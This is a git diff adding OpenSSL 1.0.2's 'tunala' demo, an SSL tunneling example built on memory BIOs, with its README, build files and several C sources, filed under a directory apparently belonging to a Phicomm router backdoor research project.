+CFLAGS=$(DEBUG_FLAGS) $(INCLUDE_FLAGS) -DNO_CONFIG_H
+COMPILE=$(CC) $(CFLAGS) -c
+
+# Edit, particularly the "-ldl" if not building with "dlfcn" support
+LINK_FLAGS=-L$(SSL_LIBDIR) -lssl -lcrypto -ldl
+
+SRCS=buffer.c cb.c ip.c sm.c tunala.c breakage.c
+OBJS=buffer.o cb.o ip.o sm.o tunala.o breakage.o
+
+TARGETS=tunala
+
+default: $(TARGETS)
+
+clean:
+	$(RM) $(OBJS) $(TARGETS) *.bak core
+
+.c.o:
+	$(COMPILE) $<
+
+tunala: $(OBJS)
+	$(CC) -o tunala $(OBJS) $(LINK_FLAGS)
+
+# Extra dependencies, should really use makedepend
+buffer.o: buffer.c tunala.h
+cb.o: cb.c tunala.h
+ip.o: ip.c tunala.h
+sm.o: sm.c tunala.h
+tunala.o: tunala.c tunala.h
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/Makefile.am b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/Makefile.am
new file mode 100644
index 0000000..706c780
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/Makefile.am
@@ -0,0 +1,7 @@
+# Our includes come from the OpenSSL build-tree we're in
+INCLUDES		= -I$(top_builddir)/../../include
+
+bin_PROGRAMS		= tunala
+
+tunala_SOURCES		= tunala.c buffer.c cb.c ip.c sm.c breakage.c
+tunala_LDADD		= -L$(top_builddir)/../.. -lssl -lcrypto
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/README b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/README
new file mode 100644
index 0000000..1569008
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/README
@@ -0,0 +1,233 @@
+This is intended to be an example of a state-machine driven SSL application. It
+acts as an SSL tunneler (functioning as either the server or client half,
+depending on command-line arguments). *PLEASE* read the comments in tunala.h
+before you treat this stuff as anything more than a curiosity - YOU HAVE BEEN
+WARNED!! There, that's the draconian bit out of the way ...
+
+
+Why "tunala"??
+--------------
+
+I thought I asked you to read tunala.h?? :-)
+
+
+Show me
+-------
+
+If you want to simply see it running, skip to the end and see some example
+command-line arguments to demonstrate with.
+
+
+Where to look and what to do?
+-----------------------------
+
+The code is split up roughly coinciding with the detaching of an "abstract" SSL
+state machine (which is the purpose of all this) and its surrounding application
+specifics. This is primarily to make it possible for me to know when I could cut
+corners and when I needed to be rigorous (or at least maintain the pretense as
+such :-).
+
+Network stuff:
+
+Basically, the network part of all this is what is supposed to be abstracted out
+of the way. The intention is to illustrate one way to stick OpenSSL's mechanisms
+inside a little memory-driven sandbox and operate it like a pure state-machine.
+So, the network code is inside both ip.c (general utility functions and gory
+IPv4 details) and tunala.c itself, which takes care of application specifics
+like the main select() loop. The connectivity between the specifics of this
+application (TCP/IP tunneling and the associated network code) and the
+underlying abstract SSL state machine stuff is through the use of the "buffer_t"
+type, declared in tunala.h and implemented in buffer.c.
+
+State machine:
+
+Which leaves us, generally speaking, with the abstract "state machine" code left
+over and this is sitting inside sm.c, with declarations inside tunala.h. As can
+be seen by the definition of the state_machine_t structure and the associated
+functions to manipulate it, there are the 3 OpenSSL "handles" plus 4 buffer_t
+structures dealing with IO on both the encrypted and unencrypted sides ("dirty"
+and "clean" respectively). The "SSL" handle is what facilitates the reading and
+writing of the unencrypted (tunneled) data. The two "BIO" handles act as the
+read and write channels for encrypted tunnel traffic - in other applications
+these are often socket BIOs so that the OpenSSL framework operates with the
+network layer directly. In this example, those two BIOs are memory BIOs
+(BIO_s_mem()) so that the sending and receiving of the tunnel traffic stays
+within the state-machine, and we can handle where this gets send to (or read
+from) ourselves.
+
+
+Why?
+----
+
+If you take a look at the "state_machine_t" section of tunala.h and the code in
+sm.c, you will notice that nothing related to the concept of 'transport' is
+involved. The binding to TCP/IP networking occurs in tunala.c, specifically
+within the "tunala_item_t" structure that associates a state_machine_t object
+with 4 file-descriptors. The way to best see where the bridge between the
+outside world (TCP/IP reads, writes, select()s, file-descriptors, etc) and the
+state machine is, is to examine the "tunala_item_io()" function in tunala.c.
+This is currently around lines 641-732 but of course could be subject to change.
+
+
+And...?
+-------
+
+Well, although that function is around 90 lines of code, it could easily have
+been a lot less only I was trying to address an easily missed "gotcha" (item (2)
+below). The main() code that drives the select/accept/IO loop initialises new
+tunala_item_t structures when connections arrive, and works out which
+file-descriptors go where depending on whether we're an SSL client or server
+(client --> accepted connection is clean and proxied is dirty, server -->
+accepted connection is dirty and proxied is clean). What that tunala_item_io()
+function is attempting to do is 2 things;
+
+  (1) Perform all reads and writes on the network directly into the
+      state_machine_t's buffers (based on a previous select() result), and only
+      then allow the abstact state_machine_t to "churn()" using those buffers.
+      This will cause the SSL machine to consume as much input data from the two
+      "IN" buffers as possible, and generate as much output data into the two
+      "OUT" buffers as possible. Back up in the main() function, the next main
+      loop loop will examine these output buffers and select() for writability
+      on the corresponding sockets if the buffers are non-empty.
+
+  (2) Handle the complicated tunneling-specific issue of cascading "close"s.
+      This is the reason for most of the complexity in the logic - if one side
+      of the tunnel is closed, you can't simply close the other side and throw
+      away the whole thing - (a) there may still be outgoing data on the other
+      side of the tunnel that hasn't been sent yet, (b) the close (or things
+      happening during the close) may cause more data to be generated that needs
+      sending on the other side. Of course, this logic is complicated yet futher
+      by the fact that it's different depending on which side closes first :-)
+      state_machine_close_clean() will indicate to the state machine that the
+      unencrypted side of the tunnel has closed, so any existing outgoing data
+      needs to be flushed, and the SSL stream needs to be closed down using the
+      appropriate shutdown sequence. state_machine_close_dirty() is simpler
+      because it indicates that the SSL stream has been disconnected, so all
+      that remains before closing the other side is to flush out anything that
+      remains and wait for it to all be sent.
+
+Anyway, with those things in mind, the code should be a little easier to follow
+in terms of "what is *this* bit supposed to achieve??!!".
+
+
+How might this help?
+--------------------
+
+Well, the reason I wrote this is that there seemed to be rather a flood of
+questions of late on the openssl-dev and openssl-users lists about getting this
+whole IO logic thing sorted out, particularly by those who were trying to either
+use non-blocking IO, or wanted SSL in an environment where "something else" was
+handling the network already and they needed to operate in memory only. This
+code is loosely based on some other stuff I've been working on, although that
+stuff is far more complete, far more dependant on a whole slew of other
+network/framework code I don't want to incorporate here, and far harder to look
+at for 5 minutes and follow where everything is going. I will be trying over
+time to suck in a few things from that into this demo in the hopes it might be
+more useful, and maybe to even make this demo usable as a utility of its own.
+Possible things include:
+
+  * controlling multiple processes/threads - this can be used to combat
+    latencies and get passed file-descriptor limits on some systems, and it uses
+    a "controller" process/thread that maintains IPC links with the
+    processes/threads doing the real work.
+
+  * cert verification rules - having some say over which certs get in or out :-)
+
+  * control over SSL protocols and cipher suites
+
+  * A few other things you can already do in s_client and s_server :-)
+
+  * Support (and control over) session resuming, particularly when functioning
+    as an SSL client.
+
+If you have a particular environment where this model might work to let you "do
+SSL" without having OpenSSL be aware of the transport, then you should find you
+could use the state_machine_t structure (or your own variant thereof) and hook
+it up to your transport stuff in much the way tunala.c matches it up with those
+4 file-descriptors. The state_machine_churn(), state_machine_close_clean(), and
+state_machine_close_dirty() functions are the main things to understand - after
+that's done, you just have to ensure you're feeding and bleeding the 4
+state_machine buffers in a logical fashion. This state_machine loop handles not
+only handshakes and normal streaming, but also renegotiates - there's no special
+handling required beyond keeping an eye on those 4 buffers and keeping them in
+sync with your outer "loop" logic. Ie. if one of the OUT buffers is not empty,
+you need to find an opportunity to try and forward its data on. If one of the IN
+buffers is not full, you should keep an eye out for data arriving that should be
+placed there.
+
+This approach could hopefully also allow you to run the SSL protocol in very
+different environments. As an example, you could support encrypted event-driven
+IPC where threads/processes pass messages to each other inside an SSL layer;
+each IPC-message's payload would be in fact the "dirty" content, and the "clean"
+payload coming out of the tunnel at each end would be the real intended message.
+Likewise, this could *easily* be made to work across unix domain sockets, or
+even entirely different network/comms protocols.
+
+This is also a quick and easy way to do VPN if you (and the remote network's
+gateway) support virtual network devices that are encapsulted in a single
+network connection, perhaps PPP going through an SSL tunnel?
+
+
+Suggestions
+-----------
+
+Please let me know if you find this useful, or if there's anything wrong or
+simply too confusing about it. Patches are also welcome, but please attach a
+description of what it changes and why, and "diff -urN" format is preferred.
+Mail to geoff@openssl.org should do the trick.
+
+
+Example
+-------
+
+Here is an example of how to use "tunala" ...
+
+First, it's assumed that OpenSSL has already built, and that you are building
+inside the ./demos/tunala/ directory. If not - please correct the paths and
+flags inside the Makefile. Likewise, if you want to tweak the building, it's
+best to try and do so in the makefile (eg. removing the debug flags and adding
+optimisation flags).
+
+Secondly, this code has mostly only been tested on Linux. However, some
+autoconf/etc support has been added and the code has been compiled on openbsd
+and solaris using that.
+
+Thirdly, if you are Win32, you probably need to do some *major* rewriting of
+ip.c to stand a hope in hell. Good luck, and please mail me the diff if you do
+this, otherwise I will take a look at another time. It can certainly be done,
+but it's very non-POSIXy.
+
+See the INSTALL document for details on building.
+
+Now, if you don't have an executable "tunala" compiled, go back to "First,...".
+Rinse and repeat.
+
+Inside one console, try typing;
+
+(i)  ./tunala -listen localhost:8080 -proxy localhost:8081 -cacert CA.pem \
+              -cert A-client.pem -out_totals -v_peer -v_strict
+
+In another console, type;
+
+(ii) ./tunala -listen localhost:8081 -proxy localhost:23 -cacert CA.pem \
+              -cert A-server.pem -server 1 -out_totals -v_peer -v_strict
+
+Now if you open another console and "telnet localhost 8080", you should be
+tunneled through to the telnet service on your local machine (if it's running -
+you could change it to port "22" and tunnel ssh instead if you so desired). When
+you logout of the telnet session, the tunnel should cleanly shutdown and show
+you some traffic stats in both consoles. Feel free to experiment. :-)
+
+Notes:
+
+ - the format for the "-listen" argument can skip the host part (eg. "-listen
+   8080" is fine). If you do, the listening socket will listen on all interfaces
+   so you can connect from other machines for example. Using the "localhost"
+   form listens only on 127.0.0.1 so you can only connect locally (unless, of
+   course, you've set up weird stuff with your networking in which case probably
+   none of the above applies).
+
+ - ./tunala -? gives you a list of other command-line options, but tunala.c is
+   also a good place to look :-)
+
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/autogunk.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/autogunk.sh
new file mode 100755
index 0000000..c9783c6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/autogunk.sh
@@ -0,0 +1,25 @@
+#!/bin/sh
+
+# This script tries to follow the "GNU way" w.r.t. the autobits.
+# This does of course generate a number of irritating files.
+# Try to get over it (I am getting there myself).
+
+# This should generate any missing crud, and then run autoconf which should turn
+# configure.in into a "./configure" script and "Makefile.am" into a
+# "Makefile.in". Then running "./configure" should turn "Makefile.in" into
+# "Makefile" and should generate the config.h containing your systems various
+# settings. I know ... what a hassle ...
+
+# Also, sometimes these autobits things generate bizarre output (looking like
+# errors). So I direct everything "elsewhere" ...
+
+(aclocal
+autoheader
+libtoolize --copy --force
+automake --foreign --add-missing --copy
+autoconf) 1> /dev/null 2>&1
+
+# Move the "no-autotools" Makefile out of the way
+if test ! -f Makefile.plain; then
+	mv Makefile Makefile.plain
+fi
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/autoungunk.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/autoungunk.sh
new file mode 100755
index 0000000..2179088
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/autoungunk.sh
@@ -0,0 +1,19 @@
+#!/bin/sh
+
+# This script tries to clean up as much as is possible from whatever diabolical
+# mess has been left in the directory thanks to autoconf, automake, and their
+# friends.
+
+if test -f Makefile.plain; then
+	if test -f Makefile; then
+		make distclean
+	fi
+	mv Makefile.plain Makefile
+else
+	make clean
+fi
+
+rm -f aclocal.m4 config.* configure install-sh \
+	missing mkinstalldirs stamp-h.* Makefile.in \
+	ltconfig ltmain.sh depcomp
+rm -rf autom4te.cache
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/breakage.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/breakage.c
new file mode 100644
index 0000000..16a3b9e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/breakage.c
@@ -0,0 +1,68 @@
+#include "tunala.h"
+
+int int_strtoul(const char *str, unsigned long *val)
+{
+#ifdef HAVE_STRTOUL
+    char *tmp;
+    unsigned long ret = strtoul(str, &tmp, 10);
+    if ((str == tmp) || (*tmp != '\0'))
+        /* The value didn't parse cleanly */
+        return 0;
+    if (ret == ULONG_MAX)
+        /* We hit a limit */
+        return 0;
+    *val = ret;
+    return 1;
+#else
+    char buf[2];
+    unsigned long ret = 0;
+    buf[1] = '\0';
+    if (str == '\0')
+        /* An empty string ... */
+        return 0;
+    while (*str != '\0') {
+        /*
+         * We have to multiply 'ret' by 10 before absorbing the next digit.
+         * If this will overflow, catch it now.
+         */
+        if (ret && (((ULONG_MAX + 10) / ret) < 10))
+            return 0;
+        ret *= 10;
+        if (!isdigit(*str))
+            return 0;
+        buf[0] = *str;
+        ret += atoi(buf);
+        str++;
+    }
+    *val = ret;
+    return 1;
+#endif
+}
+
+#ifndef HAVE_STRSTR
+char *int_strstr(const char *haystack, const char *needle)
+{
+    const char *sub_haystack = haystack, *sub_needle = needle;
+    unsigned int offset = 0;
+    if (!needle)
+        return haystack;
+    if (!haystack)
+        return NULL;
+    while ((*sub_haystack != '\0') && (*sub_needle != '\0')) {
+        if (sub_haystack[offset] == sub_needle) {
+            /* sub_haystack is still a candidate */
+            offset++;
+            sub_needle++;
+        } else {
+            /* sub_haystack is no longer a possibility */
+            sub_haystack++;
+            offset = 0;
+            sub_needle = needle;
+        }
+    }
+    if (*sub_haystack == '\0')
+        /* Found nothing */
+        return NULL;
+    return sub_haystack;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/buffer.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/buffer.c
new file mode 100644
index 0000000..8e2cc9d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/buffer.c
@@ -0,0 +1,236 @@
+#include "tunala.h"
+
+#ifndef NO_BUFFER
+
+void buffer_init(buffer_t * buf)
+{
+    buf->used = 0;
+    buf->total_in = buf->total_out = 0;
+}
+
+void buffer_close(buffer_t * buf)
+{
+    /* Our data is static - nothing needs "release", just reset it */
+    buf->used = 0;
+}
+
+/* Code these simple ones in compact form */
+unsigned int buffer_used(buffer_t * buf)
+{
+    return buf->used;
+}
+
+unsigned int buffer_unused(buffer_t * buf)
+{
+    return (MAX_DATA_SIZE - buf->used);
+}
+
+int buffer_full(buffer_t * buf)
+{
+    return (buf->used == MAX_DATA_SIZE ? 1 : 0);
+}
+
+int buffer_notfull(buffer_t * buf)
+{
+    return (buf->used < MAX_DATA_SIZE ? 1 : 0);
+}
+
+int buffer_empty(buffer_t * buf)
+{
+    return (buf->used == 0 ? 1 : 0);
+}
+
+int buffer_notempty(buffer_t * buf)
+{
+    return (buf->used > 0 ? 1 : 0);
+}
+
+unsigned long buffer_total_in(buffer_t * buf)
+{
+    return buf->total_in;
+}
+
+unsigned long buffer_total_out(buffer_t * buf)
+{
+    return buf->total_out;
+}
+
+/*
+ * These 3 static (internal) functions don't adjust the "total" variables as
+ * it's not sure when they're called how it should be interpreted. Only the
+ * higher-level "buffer_[to|from]_[fd|SSL|BIO]" functions should alter these
+ * values.
+ */
+# if 0                          /* To avoid "unused" warnings */
+static unsigned int buffer_adddata(buffer_t * buf, const unsigned char *ptr,
+                                   unsigned int size)
+{
+    unsigned int added = MAX_DATA_SIZE - buf->used;
+    if (added > size)
+        added = size;
+    if (added == 0)
+        return 0;
+    memcpy(buf->data + buf->used, ptr, added);
+    buf->used += added;
+    buf->total_in += added;
+    return added;
+}
+
+static unsigned int buffer_tobuffer(buffer_t * to, buffer_t * from, int cap)
+{
+    unsigned int moved, tomove = from->used;
+    if ((int)tomove > cap)
+        tomove = cap;
+    if (tomove == 0)
+        return 0;
+    moved = buffer_adddata(to, from->data, tomove);
+    if (moved == 0)
+        return 0;
+    buffer_takedata(from, NULL, moved);
+    return moved;
+}
+# endif
+
+static unsigned int buffer_takedata(buffer_t * buf, unsigned char *ptr,
+                                    unsigned int size)
+{
+    unsigned int taken = buf->used;
+    if (taken > size)
+        taken = size;
+    if (taken == 0)
+        return 0;
+    if (ptr)
+        memcpy(ptr, buf->data, taken);
+    buf->used -= taken;
+    /* Do we have to scroll? */
+    if (buf->used > 0)
+        memmove(buf->data, buf->data + taken, buf->used);
+    return taken;
+}
+
+# ifndef NO_IP
+
+int buffer_from_fd(buffer_t * buf, int fd)
+{
+    int toread = buffer_unused(buf);
+    if (toread == 0)
+        /* Shouldn't be called in this case! */
+        abort();
+    toread = read(fd, buf->data + buf->used, toread);
+    if (toread > 0) {
+        buf->used += toread;
+        buf->total_in += toread;
+    }
+    return toread;
+}
+
+int buffer_to_fd(buffer_t * buf, int fd)
+{
+    int towrite = buffer_used(buf);
+    if (towrite == 0)
+        /* Shouldn't be called in this case! */
+        abort();
+    towrite = write(fd, buf->data, towrite);
+    if (towrite > 0) {
+        buffer_takedata(buf, NULL, towrite);
+        buf->total_out += towrite;
+    }
+    return towrite;
+}
+
+# endif                         /* !defined(NO_IP) */
+
+# ifndef NO_OPENSSL
+
+static void int_ssl_check(SSL *s, int ret)
+{
+    int e = SSL_get_error(s, ret);
+    switch (e) {
+        /*
+         * These seem to be harmless and already "dealt with" by our
+         * non-blocking environment. NB: "ZERO_RETURN" is the clean "error"
+         * indicating a successfully closed SSL tunnel. We let this happen
+         * because our IO loop should not appear to have broken on this
+         * condition - and outside the IO loop, the "shutdown" state is
+         * checked.
+         */
+    case SSL_ERROR_NONE:
+    case SSL_ERROR_WANT_READ:
+    case SSL_ERROR_WANT_WRITE:
+    case SSL_ERROR_WANT_X509_LOOKUP:
+    case SSL_ERROR_ZERO_RETURN:
+        return;
+        /*
+         * These seem to be indications of a genuine error that should result
+         * in the SSL tunnel being regarded as "dead".
+         */
+    case SSL_ERROR_SYSCALL:
+    case SSL_ERROR_SSL:
+        SSL_set_app_data(s, (char *)1);
+        return;
+    default:
+        break;
+    }
+    /*
+     * For any other errors that (a) exist, and (b) crop up - we need to
+     * interpret what to do with them - so "politely inform" the caller that
+     * the code needs updating here.
+     */
+    abort();
+}
+
+void buffer_from_SSL(buffer_t * buf, SSL *ssl)
+{
+    int ret;
+    if (!ssl || buffer_full(buf))
+        return;
+    ret = SSL_read(ssl, buf->data + buf->used, buffer_unused(buf));
+    if (ret > 0) {
+        buf->used += ret;
+        buf->total_in += ret;
+    }
+    if (ret < 0)
+        int_ssl_check(ssl, ret);
+}
+
+void buffer_to_SSL(buffer_t * buf, SSL *ssl)
+{
+    int ret;
+    if (!ssl || buffer_empty(buf))
+        return;
+    ret = SSL_write(ssl, buf->data, buf->used);
+    if (ret > 0) {
+        buffer_takedata(buf, NULL, ret);
+        buf->total_out += ret;
+    }
+    if (ret < 0)
+        int_ssl_check(ssl, ret);
+}
+
+void buffer_from_BIO(buffer_t * buf, BIO *bio)
+{
+    int ret;
+    if (!bio || buffer_full(buf))
+        return;
+    ret = BIO_read(bio, buf->data + buf->used, buffer_unused(buf));
+    if (ret > 0) {
+        buf->used += ret;
+        buf->total_in += ret;
+    }
+}
+
+void buffer_to_BIO(buffer_t * buf, BIO *bio)
+{
+    int ret;
+    if (!bio || buffer_empty(buf))
+        return;
+    ret = BIO_write(bio, buf->data, buf->used);
+    if (ret > 0) {
+        buffer_takedata(buf, NULL, ret);
+        buf->total_out += ret;
+    }
+}
+
+# endif                         /* !defined(NO_OPENSSL) */
+
+#endif                          /* !defined(NO_BUFFER) */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/cb.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/cb.c
new file mode 100644
index 0000000..684a07f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/cb.c
@@ -0,0 +1,173 @@
+#include "tunala.h"
+
+#ifndef NO_OPENSSL
+
+/* For callbacks generating output, here are their file-descriptors. */
+static FILE *fp_cb_ssl_info = NULL;
+static FILE *fp_cb_ssl_verify = NULL;
+/*-
+ * Output level:
+ *     0 = nothing,
+ *     1 = minimal, just errors,
+ *     2 = minimal, all steps,
+ *     3 = detail, all steps */
+static unsigned int cb_ssl_verify_level = 1;
+
+/* Other static rubbish (to mirror s_cb.c where required) */
+static int int_verify_depth = 10;
+
+/*
+ * This function is largely borrowed from the one used in OpenSSL's
+ * "s_client" and "s_server" utilities.
+ */
+void cb_ssl_info(const SSL *s, int where, int ret)
+{
+    const char *str1, *str2;
+    int w;
+
+    if (!fp_cb_ssl_info)
+        return;
+
+    w = where & ~SSL_ST_MASK;
+    str1 = (w & SSL_ST_CONNECT ? "SSL_connect" : (w & SSL_ST_ACCEPT ?
+                                                  "SSL_accept" :
+                                                  "undefined")), str2 =
+        SSL_state_string_long(s);
+
+    if (where & SSL_CB_LOOP)
+        fprintf(fp_cb_ssl_info, "(%s) %s\n", str1, str2);
+    else if (where & SSL_CB_EXIT) {
+        if (ret == 0)
+            fprintf(fp_cb_ssl_info, "(%s) failed in %s\n", str1, str2);
+        /*
+         * In a non-blocking model, we get a few of these "error"s simply
+         * because we're calling "reads" and "writes" on the state-machine
+         * that are virtual NOPs simply to avoid wasting the time seeing if
+         * we *should* call them. Removing this case makes the "-out_state"
+         * output a lot easier on the eye.
+         */
+# if 0
+        else if (ret < 0)
+            fprintf(fp_cb_ssl_info, "%s:error in %s\n", str1, str2);
+# endif
+    }
+}
+
+void cb_ssl_info_set_output(FILE *fp)
+{
+    fp_cb_ssl_info = fp;
+}
+
+static const char *int_reason_no_issuer =
+    "X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT";
+static const char *int_reason_not_yet = "X509_V_ERR_CERT_NOT_YET_VALID";
+static const char *int_reason_before =
+    "X509_V_ERR_ERROR_IN_CERT_NOT_BEFORE_FIELD";
+static const char *int_reason_expired = "X509_V_ERR_CERT_HAS_EXPIRED";
+static const char *int_reason_after =
+    "X509_V_ERR_ERROR_IN_CERT_NOT_AFTER_FIELD";
+
+/* Stolen wholesale from apps/s_cb.c :-) And since then, mutilated ... */
+int cb_ssl_verify(int ok, X509_STORE_CTX *ctx)
+{
+    char buf1[256];             /* Used for the subject name */
+    char buf2[256];             /* Used for the issuer name */
+    const char *reason = NULL;  /* Error reason (if any) */
+    X509 *err_cert;
+    int err, depth;
+
+    if (!fp_cb_ssl_verify || (cb_ssl_verify_level == 0))
+        return ok;
+    err_cert = X509_STORE_CTX_get_current_cert(ctx);
+    err = X509_STORE_CTX_get_error(ctx);
+    depth = X509_STORE_CTX_get_error_depth(ctx);
+
+    buf1[0] = buf2[0] = '\0';
+    /* Fill buf1 */
+    X509_NAME_oneline(X509_get_subject_name(err_cert), buf1, 256);
+    /* Fill buf2 */
+    X509_NAME_oneline(X509_get_issuer_name(ctx->current_cert), buf2, 256);
+    switch (ctx->error) {
+    case X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT:
+        reason = int_reason_no_issuer;
+        break;
+    case X509_V_ERR_CERT_NOT_YET_VALID:
+        reason = int_reason_not_yet;
+        break;
+    case X509_V_ERR_ERROR_IN_CERT_NOT_BEFORE_FIELD:
+        reason = int_reason_before;
+        break;
+    case X509_V_ERR_CERT_HAS_EXPIRED:
+        reason = int_reason_expired;
+        break;
+    case X509_V_ERR_ERROR_IN_CERT_NOT_AFTER_FIELD:
+        reason = int_reason_after;
+        break;
+    }
+
+    if ((cb_ssl_verify_level == 1) && ok)
+        return ok;
+    fprintf(fp_cb_ssl_verify, "chain-depth=%d, ", depth);
+    if (reason)
+        fprintf(fp_cb_ssl_verify, "error=%s\n", reason);
+    else
+        fprintf(fp_cb_ssl_verify, "error=%d\n", err);
+    if (cb_ssl_verify_level < 3)
+        return ok;
+    fprintf(fp_cb_ssl_verify, "--> subject = %s\n", buf1);
+    fprintf(fp_cb_ssl_verify, "--> issuer  = %s\n", buf2);
+    if (!ok)
+        fprintf(fp_cb_ssl_verify, "--> verify error:num=%d:%s\n", err,
+                X509_verify_cert_error_string(err));
+    fprintf(fp_cb_ssl_verify, "--> verify return:%d\n", ok);
+    return ok;
+}
+
+void cb_ssl_verify_set_output(FILE *fp)
+{
+    fp_cb_ssl_verify = fp;
+}
+
+void cb_ssl_verify_set_depth(unsigned int verify_depth)
+{
+    int_verify_depth = verify_depth;
+}
+
+void cb_ssl_verify_set_level(unsigned int level)
+{
+    if (level < 4)
+        cb_ssl_verify_level = level;
+}
+
+RSA *cb_generate_tmp_rsa(SSL *s, int is_export, int keylength)
+{
+    /*
+     * TODO: Perhaps make it so our global key can be generated on-the-fly
+     * after certain intervals?
+     */
+    static RSA *rsa_tmp = NULL;
+    BIGNUM *bn = NULL;
+    int ok = 1;
+    if (!rsa_tmp) {
+        ok = 0;
+        if (!(bn = BN_new()))
+            goto end;
+        if (!BN_set_word(bn, RSA_F4))
+            goto end;
+        if (!(rsa_tmp = RSA_new()))
+            goto end;
+        if (!RSA_generate_key_ex(rsa_tmp, keylength, bn, NULL))
+            goto end;
+        ok = 1;
+    }
+ end:
+    if (bn)
+        BN_free(bn);
+    if (!ok) {
+        RSA_free(rsa_tmp);
+        rsa_tmp = NULL;
+    }
+    return rsa_tmp;
+}
+
+#endif                          /* !defined(NO_OPENSSL) */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/configure.in b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/configure.in
new file mode 100644
index 0000000..590cdbf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/configure.in
@@ -0,0 +1,29 @@
+dnl Process this file with autoconf to produce a configure script.
+AC_INIT(tunala.c)
+AM_CONFIG_HEADER(config.h)
+AM_INIT_AUTOMAKE(tunala, 0.0.1-dev)
+
+dnl Checks for programs. (Though skip libtool)
+AC_PROG_CC
+dnl AC_PROG_LIBTOOL
+dnl AM_PROG_LIBTOOL
+
+dnl Checks for libraries.
+AC_CHECK_LIB(dl, dlopen)
+AC_CHECK_LIB(z, inflate)
+AC_CHECK_LIB(socket, socket)
+AC_CHECK_LIB(nsl, gethostbyname)
+
+dnl Checks for header files.
+AC_HEADER_STDC
+AC_CHECK_HEADERS(fcntl.h limits.h unistd.h)
+
+dnl Checks for typedefs, structures, and compiler characteristics.
+AC_C_CONST
+
+dnl Checks for library functions.
+AC_CHECK_FUNCS(strstr strtoul)
+AC_CHECK_FUNCS(select socket)
+AC_CHECK_FUNCS(dlopen)
+
+AC_OUTPUT(Makefile)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/ip.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/ip.c
new file mode 100644
index 0000000..b172d2e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/ip.c
@@ -0,0 +1,149 @@
+#include "tunala.h"
+
+#ifndef NO_IP
+
+# define IP_LISTENER_BACKLOG 511/* So if it gets masked by 256 or some other
+                                 * such value it'll still be respectable */
+
+/* Any IP-related initialisations. For now, this means blocking SIGPIPE */
+int ip_initialise(void)
+{
+    struct sigaction sa;
+
+    sa.sa_handler = SIG_IGN;
+    sa.sa_flags = 0;
+    sigemptyset(&sa.sa_mask);
+    if (sigaction(SIGPIPE, &sa, NULL) != 0)
+        return 0;
+    return 1;
+}
+
+int ip_create_listener_split(const char *ip, unsigned short port)
+{
+    struct sockaddr_in in_addr;
+    int fd = -1;
+    int reuseVal = 1;
+
+    /* Create the socket */
+    if ((fd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
+        goto err;
+    /* Set the SO_REUSEADDR flag - servers act weird without it */
+    if (setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, (char *)(&reuseVal),
+                   sizeof(reuseVal)) != 0)
+        goto err;
+    /* Prepare the listen address stuff */
+    in_addr.sin_family = AF_INET;
+    memcpy(&in_addr.sin_addr.s_addr, ip, 4);
+    in_addr.sin_port = htons(port);
+    /* Bind to the required port/address/interface */
+    if (bind(fd, (struct sockaddr *)&in_addr, sizeof(struct sockaddr_in)) !=
+        0)
+        goto err;
+    /* Start "listening" */
+    if (listen(fd, IP_LISTENER_BACKLOG) != 0)
+        goto err;
+    return fd;
+ err:
+    if (fd != -1)
+        close(fd);
+    return -1;
+}
+
+int ip_create_connection_split(const char *ip, unsigned short port)
+{
+    struct sockaddr_in in_addr;
+    int flags, fd = -1;
+
+    /* Create the socket */
+    if ((fd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
+        goto err;
+    /* Make it non-blocking */
+    if (((flags = fcntl(fd, F_GETFL, 0)) < 0) ||
+        (fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0))
+        goto err;
+    /* Prepare the connection address stuff */
+    in_addr.sin_family = AF_INET;
+    memcpy(&in_addr.sin_addr.s_addr, ip, 4);
+    in_addr.sin_port = htons(port);
+    /* Start a connect (non-blocking, in all likelihood) */
+    if ((connect(fd, (struct sockaddr *)&in_addr,
+                 sizeof(struct sockaddr_in)) != 0) && (errno != EINPROGRESS))
+        goto err;
